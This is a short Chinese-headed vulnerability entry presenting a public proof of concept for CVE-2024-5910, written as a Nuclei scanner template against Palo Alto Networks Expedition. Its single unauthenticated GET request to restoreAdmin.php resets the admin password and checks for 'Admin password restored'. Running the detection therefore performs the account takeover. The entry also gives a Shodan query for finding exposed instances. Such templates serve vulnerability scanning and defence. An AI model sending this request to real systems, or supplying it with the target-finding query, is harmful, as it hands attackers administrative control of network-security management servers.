漏洞描述
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
CVE-2024-5910: Palo Alto Expedition - Admin Account Takeover
PoC代码[已公开]
id: CVE-2024-5910
info:
name: Palo Alto Expedition - Admin Account Takeover
author: johnk3r
severity: critical
description: |
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
reference:
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
- https://security.paloaltonetworks.com/CVE-2024-5910
- https://nvd.nist.gov/vuln/detail/CVE-2024-5910
classification:
cve-id: CVE-2024-5910
cvss-score: 9.3
cwe-id: CWE-306
epss-score: 0.91029
epss-percentile: 0.99611
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: cve,cve2024,palo-alto,auth-bypass,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"
matchers-condition: and
matchers:
- type: word
words:
- "Admin user found"
- "Admin password restored"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100a059ae5448ab5a140e2ca4c880abe31459afb1b990c94069a605f9b0b5b8eba9022007f342cd7d94d01a0ddcef7859a1431c69eb27e394e790908f27dbac6efc7973:922c64590222798bb761d5b6d8e72950